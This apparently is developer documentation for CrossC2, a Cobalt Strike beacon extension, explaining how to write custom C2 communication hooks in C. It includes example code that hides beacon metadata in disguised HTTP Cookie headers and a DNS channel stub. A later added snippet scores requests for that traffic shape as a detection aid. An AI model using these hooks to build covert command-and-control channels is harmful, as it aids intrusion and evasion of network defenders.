Custom communication protocol
CrossC2 exposes a communication protocol API that can be implemented to apply C2Profile settings or to define a custom protocol.
Instructions
After writing the communication protocol implementation, compile it into a dynamic library with `gcc test.c -fPIC -shared -o lib_rebind_test.so` (or `clang` in place of `gcc`).
When generating a beacon, use the `rebind_dynamic_lib` option in the cna or in genCrossC2 to specify the dynamic library just generated (`lib_rebind_test.so`). The generated beacon will then send communication packets according to the protocol implementation in that library.
HTTPS communication template modification
These correspond to the 4 setting options in C2Profile:
```
http-get {
    client(send) { metadata{} }
    server(recv) { output{} }
}
http-post {
    client(send) {
        id {}
        output {}
    }
    server(recv) { output{} }
}
```
```c
void (*cc2_rebind_http_get_send)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_get_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_send)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
```
`cc2_rebind_http_x_send` series of functions:
Wrap the incoming base64(metadata) data and return the complete HTTP message.
`*reqData` is the base64-encoded data to be sent (the metadata field) - C2Profile http-get { client { (metadata) } }
`**outputData` returns the actual HTTP content that needs to be sent.
`cc2_rebind_http_x_recv` series of functions:
Parse the incoming HTTP message and return the base64(output) data.
`*resData` is the complete HTTP content returned by the server.
`**outputData` returns the actual content carried in the HTTP message (the base64-encoded output field) - C2Profile http-get { server { (output) } }
Communication protocol customization
```c
void (*cc2_rebind_get_protocol)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_post_protocol)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
```
`cc2_rebind_x_protocol` series of functions:
Send the incoming raw data over the custom communication channel, receive the response, and return the resulting base64(output) data.
`*reqData` is the base64-encoded data to be sent (metadata field / id + output field).
`**outputData` is the base64-encoded server response data (output field).
Example:
HTTPS communication template customization:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Helper not shown on this page; prototype assumed from the call below.
char *find_pay(char *rawData, long long rawData_len);

void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom http get send ------\n");
    const char *requestTemplate = "GET /%s HTTP/1.1\r\n"
                                  "Host: http.cc2.com\r\n"
                                  "Accept: gzip, deflate\r\n"
                                  "User-Agent: cc2_rebind_http_get_send\r\n"
                                  "Cookie: %s\r\n"
                                  "Connection: cc2_rebind_http_get_send\r\n\r\n";
    char postPayload[20000];
    // snprintf bounds the write; data that does not fit the buffer is rejected
    int n = snprintf(postPayload, sizeof(postPayload), requestTemplate, "test", reqData);
    *outputData = NULL;
    *outputData_len = 0;
    if (n < 0 || (size_t)n >= sizeof(postPayload)) {
        return;
    }
    // Write the generated HTTP data to outputData (one spare byte keeps it NUL-terminated)
    *outputData = (char *)calloc(1, (size_t)n + 1);
    if (*outputData == NULL) {
        return;
    }
    memcpy(*outputData, postPayload, (size_t)n);
    *outputData_len = n;
    printf("-------------------------\n");
}

void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
    printf("------ custom http get recv ------\n");
    // rawData = "HTTP/1.1 200 OK
    //            Date: Tue, 26 May 2020 10:12:28 GMT
    //            Server: CC2_server
    //            Content-Length: 32
    //            Connection: close
    //            Content-Type: text/html; charset=iso-8859-1
    //
    //            XXXXZZZZXXXXAAAZZ=="
    char *payload = find_pay(rawData, rawData_len); // return "XXXXZZZZXXXXAAAZZ=="
    *outputData = NULL;
    *outputData_len = 0;
    if (payload == NULL) {
        return; // no body found in the response
    }
    size_t payload_len = strlen(payload);
    *outputData = (char *)calloc(1, payload_len + 1);
    if (*outputData == NULL) {
        return;
    }
    memcpy(*outputData, payload, payload_len);
    *outputData_len = (long long)payload_len;
    printf("-------------------------\n");
}
```
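Seen from the detection side, the GET template above yields a request whose `Cookie` value is one bare base64 blob rather than `name=value` pairs and whose `Connection` value is not a usual token. The check below is an added example, not code from CrossC2 or the original page; `score_request`, the sample requests and the 16-character threshold are assumptions, and it only matches the unmodified template shape.

```c
#include <ctype.h>
#include <string.h>
#include <strings.h>
/* Constructed samples: the request shape from the template above (made-up
   base64 blob as the Cookie value) and an ordinary browser-style request. */
static const char SAMPLE_TEMPLATE_REQ[] =
    "GET /test HTTP/1.1\r\nHost: http.cc2.com\r\nAccept: gzip, deflate\r\n"
    "User-Agent: cc2_rebind_http_get_send\r\nCookie: QUJDREVGR0hJSktMTU5PUA==\r\n"
    "Connection: cc2_rebind_http_get_send\r\n\r\n";
static const char SAMPLE_NORMAL_REQ[] =
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "Cookie: session=QUJDREVGR0g=; theme=dark\r\nConnection: keep-alive\r\n\r\n";

/* Copy the value of header `name` into out (cap bytes); return 1 if present. */
static int header_value(const char *req, const char *name, char *out, size_t cap) {
    size_t nlen = strlen(name);
    const char *line = strstr(req, "\r\n");           /* end of request line */
    while (line && strncmp(line, "\r\n\r\n", 4) != 0) {
        line += 2;                                    /* start of next header */
        if (strncasecmp(line, name, nlen) == 0 && line[nlen] == ':') {
            const char *v = line + nlen + 1;
            v += strspn(v, " \t");
            size_t n = strcspn(v, "\r\n");
            if (n >= cap) n = cap - 1;
            memcpy(out, v, n); out[n] = '\0';
            return 1;
        }
        line = strstr(line, "\r\n");
    }
    return 0;
}

/* One bare base64 blob, no name=value pair; 16-char minimum is an assumption. */
static int cookie_is_bare_base64(const char *v) {
    size_t n = strlen(v), i = 0;
    while (i < n && (isalnum((unsigned char)v[i]) || v[i] == '+' || v[i] == '/')) i++;
    if (i < 16) return 0;
    while (i < n && v[i] == '=') i++;
    return i == n;
}

/* Bitmask: 1 = bare base64 Cookie, 2 = Connection is not a usual single token. */
int score_request(const char *req) {
    char v[512]; int flags = 0;
    if (header_value(req, "Cookie", v, sizeof v) && cookie_is_bare_base64(v)) flags |= 1;
    if (header_value(req, "Connection", v, sizeof v) && strcasecmp(v, "keep-alive") &&
        strcasecmp(v, "close") && strcasecmp(v, "upgrade")) flags |= 2;
    return flags;
}
```

Because both header values come from a template the operator can edit, treat a non-zero score as a hunting lead to correlate with other signals, not as a signature.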
Communication protocol customization
```c
void cc2_rebind_get_protocol(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom get protocol ------\n");
    // sendDNS() is a helper that is not shown on this page
    sendDNS("127.0.0.1", 53, 1, reqData, strlen(reqData), outputData, outputData_len);
    if (*outputData_len > 0) {
        // outputData_len is a long long, so it is printed with %lld
        printf("cobaltstrike cc2_server response(%lld): \n", *outputData_len);
    }
    printf("------ custom protocol ------\n");
}
```